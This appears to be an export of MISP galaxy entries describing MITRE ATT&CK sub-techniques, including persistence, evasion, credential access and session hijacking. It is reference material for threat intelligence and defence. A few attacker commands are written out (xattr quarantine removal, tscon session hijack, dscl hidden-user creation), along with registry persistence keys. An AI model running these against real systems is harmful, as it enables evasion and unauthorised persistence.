Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system. (Citation: Microsoft O365 Admin Roles) (Citation: Microsoft Support O365 Add Another Admin, October 2019) (Citation: AWS Create IAM User) (Citation: GCP Create Cloud Identity Users) (Citation: Microsoft Azure AD Users)

Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.

The tag is: *misp-galaxy:mitre-attack-pattern="Cloud Account - T1136.003”*

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**Outlook Forms - T1137.003**

Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is
sent by an adversary utilizing the same custom Outlook form. (Citation: SensePost Outlook Forms)

Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user. (Citation: SensePost Outlook Forms)

The tag is: misp-galaxy:mitre-attack-pattern="Outlook Forms - T1137.003"

**Launch Agent - T1543.001**

Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in `<code>/System/Library/LaunchAgents</code>`, `<code>/Library/LaunchAgents</code>`, and `<code>$HOME/Library/LaunchAgents</code>` (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).

Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories (Citation: Sofacy Komplex Trojan) (Citation: Methods of Mac Malware Persistence). The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).

The tag is: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001"
Gatekeeper Bypass - T1553.001

Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls. In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called `<code>com.apple.quarantine</code>`. This attribute is read by Apple’s Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution.

Apps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won’t set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). This completely bypasses the built-in Gatekeeper check. (Citation: Methods of Mac Malware Persistence) The presence of the quarantine flag can be checked by the `xattr` command `<code>xattr /path/to/MyApp.app</code>` for `<code>com.apple.quarantine</code>`. Similarly, given sudo access or elevated permission, this attribute can be removed with `xattr` as well, `<code>sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app</code>`. (Citation: Clearing quarantine attribute) (Citation: OceanLotus for OS X)

In typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS’s gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. (Citation: Bypassing Gatekeeper)

The tag is: *misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1553.001"*

**Table 3558. Table References**

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Process Doppelgänging - T1055.013

Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process.

Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)

Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)

Adversaries may abuse TxF to perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging’s use of TxF also avoids the use of highly-monitored API functions such as <code>NtUnmapViewOfSection</code>, <code>VirtualProtectEx</code>, and <code>SetThreadContext</code>. (Citation: BlackHat Process Doppelgänging Dec 2017)

Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):

- **Transact** – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
- **Load** – Create a shared section of memory and load the malicious executable.
- **Rollback** – Undo changes to original executable, effectively removing malicious code from the file system.
- **Animate** – Create a process from the tainted section of memory and initiate execution.

This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process.

The tag is: *misp-galaxy:mitre-attack-pattern=*"Process Doppelgänging - T1055.013"

Table 3559. Table References
SSH Hijacking - T1563.001

Adversaries may hijack a legitimate user’s SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.

In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent’s socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)

[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).

The tag is: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1563.001"

Table 3560. Table References
Symmetric Cryptography - T1573.001

Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.

The tag is: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001"

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Outlook Rules - T1137.005

Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)

Once malicious rules have been added to the user's mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)

The tag is: misp-galaxy:mitre-attack-pattern="Outlook Rules - T1137.005"

Table 3562. Table References

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Social Media - T1593.001

Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.

Adversaries may search in different social media sites depending on what information they seek to
gather. Threat actors may passively harvest data from these sites, as well as use information
gathered to create fake profiles/groups to elicit victim's into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)). (Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).

The tag is: *misp-galaxy:mitre-attack-pattern="Social Media - T1593.001"

Table 3563. Table References

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### VDSO Hijacking - T1055.014

Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process.

VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process’ global offset table (which store absolute addresses of mapped library functions). (Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)

Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: *misp-galaxy:mitre-attack-pattern="VDSO Hijacking - T1055.014"

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**AppInit DLLs - T1546.010**

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the `<code>AppInit_DLLs</code>` value in the Registry keys `<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code>` or `<code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code>` are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017)

Similar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity.

The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)

The tag is: `misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1546.010"

Table 3565. Table References

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**Port Monitors - T1547.010**

Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the `<code>AddMonitor</code>` API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in `<code>C:\Windows\System32</code>` and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to...
HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors.

The Registry key contains entries for the following:

- Local Port
- Standard TCP/IP Port
- USB Monitor
- WSD Port

Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.

The tag is: `misp-galaxy:mitre-attack-pattern="Port Monitors - T1547.010"`

### Identify Roles - T1591.004

Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: `misp-galaxy:mitre-attack-pattern="Identify Roles - T1591.004"`
System Checks - T1497.001

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.

Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment.

Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size.

Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output.

Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)

The tag is: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001"

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Golden Ticket - T1558.001

Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket. (Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory. (Citation: CERT-EU Golden Ticket Protection)

Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS. (Citation: ADSecurity Detecting Forged Tickets)

The KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets. (Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.

The tag is: misp-galaxy:mitre-attack-pattern="Golden Ticket - T1558.001"

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Spearphishing Attachment - T1566.001

Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and...
may explain how to bypass system protections in order to do so. The email may also contain
instructions on how to decrypt an attachment, such as a zip file password, in order to evade email
boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make
attached executables appear to be document files, or files exploiting one application appear to be a
file for a different one.

The tag is: `misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001"

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**Create Snapshot - T1578.001**

An adversary may create a snapshot or data backup within a cloud account to evade defenses. A
snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine
(VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in
order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in
[Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may
revert to a snapshot to evade detection and remove evidence of their presence.

An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount
one or more created snapshots to that instance, and then apply a policy that allows the adversary
access to the created instance, such as a firewall policy that allows them inbound and outbound
SSH access.(Citation: Mandiant M-Trends 2020)

The tag is: `misp-galaxy:mitre-attack-pattern="Create Snapshot - T1578.001"

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Spearphishing Service - T1598.001

Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.

The tag is: `misp-galaxy:mitre-attack-pattern="Spearphishing Service - T1598.001"`

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Component Firmware - T1542.002

Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.

Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.

The tag is: `misp-galaxy:mitre-attack-pattern="Component Firmware - T1542.002"`

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Systemd Service - T1543.002

Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources. (Citation: Linux man-pages: systemd January 2014) (Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.

Systemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the <code>/etc/systemd/system</code> and <code>/usr/lib/systemd/system</code> directories and have the file extension <code>.service</code>. Each service unit file may contain numerous directives that can execute system commands:

- **ExecStart, ExecStartPre, and ExecStartPost directives** cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start.
- **ExecReload directive** covers when a service restarts.
- **ExecStop and ExecStopPost directives** cover when a service is stopped or manually by 'systemctl'.

Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot. (Citation: Anomali Rocke March 2019)

While adversaries typically require root privileges to create/modify service unit files in the <code>/etc/systemd/system</code> and <code>/usr/lib/systemd/system</code> directories, low privilege users can create/modify service unit files in directories such as <code>~/.config/systemd/user/</code> to achieve user-level persistence. (Citation: Rapid7 Service Persistence 22JUNE2016)

The tag is: **misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002"**

Table 3574. Table References

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**Bash History - T1552.003**

Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user's `<code>.bash_history</code>` file. For each user, this file resides at the same location: `<code>~/.bash_history</code>`. Typically, this file keeps track of the user's last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)

The tag is: *misp-galaxy:mitre-attack-pattern="Bash History - T1552.003"*

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**Code Signing - T1553.002**

Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.

Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)

Code signing certificates may be used to bypass security policies that require signed code to execute on a system.

The tag is: *misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002"*

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RDP Hijacking - T1563.002

Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services)

Adversaries may perform RDP session hijacking which involves stealing a legitimate user’s remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\windows\system32\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools. (Citation: Kali Redsnarf)

The tag is: `misp-galaxy:mitre-attack-pattern="RDP Hijacking - T1563.002"

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Asymmetric Cryptography - T1573.002

Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.
For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).

The tag is: `misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002"

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**DNS Server - T1583.002**

Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.

By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel. (Citation: Unit42 DNS Mar 2019)

The tag is: `misp-galaxy:mitre-attack-pattern="DNS Server - T1583.002"

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**Search Engines - T1593.002**

Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes). (Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)

Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well
as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: `misp-galaxy:mitre-attack-pattern="Search Engines - T1593.002"`

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### TFTP Boot - T1542.005

Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.

Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONKit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)

The tag is: `misp-galaxy:mitre-attack-pattern="TFTP Boot - T1542.005"`

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Private Keys - T1552.004

Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk, .p12, .pem, .pfx, .cer, .p7b, .asc.

Adversaries may also look in common key directories, such as <code>~/.ssh</code> for SSH keys on *nix-based systems or <code>C:\Users\(username)\.ssh</code> on Windows. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.

Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates. (Citation: Kaspersky Careto) (Citation: Palo Alto Prince of Persia)

Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.

The tag is: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004"

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Hidden Users - T1564.002

Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.

There is a property value in <code>/Library/Preferences/com.apple.loginwindow</code> called <code>Hide500Users</code> that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: <code>sudo dscl . -create /Users/username UniqueID 401</code>) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit).

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Users - T1564.002"
**Authentication Package - T1547.002**

Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)

Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location `HKLM\SYSTEM\CurrentControlSet\Control\Lsa` with the key value of `"Authentication Packages"=<target binary>` . The binary will then be executed by the system when the authentication packages are loaded.

The tag is: *misp-galaxy:mitre-attack-pattern="Authentication Package - T1547.002"*

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**DNS Server - T1584.002**

Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.

By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary. (Citation: Talos DNSpionage Nov 2018) (Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server. (Citation: CiscoAngler) (Citation: Proofpoint Domain Shadowing)

The tag is: *misp-galaxy:mitre-attack-pattern="DNS Server - T1584.002"*
Client Configurations - T1592.004

Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors. Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: `misp-galaxy:mitre-attack-pattern="Client Configurations - T1592.004"`

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Reflection Amplification - T1498.002

Adversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors.
with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target. (Citation: Cloudflare ReflectionDoS May 2017)

Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS (Citation: Cloudflare DNS Amplification DoS) and NTP (Citation: Cloudflare NTP Amplification DoS), though the use of several others in the wild have been documented. (Citation: Arbor Annual DoS report Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet. (Citation: Cloudflare Memcrashed Feb 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Reflection Amplification - T1498.002"

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Securityd Memory - T1555.002

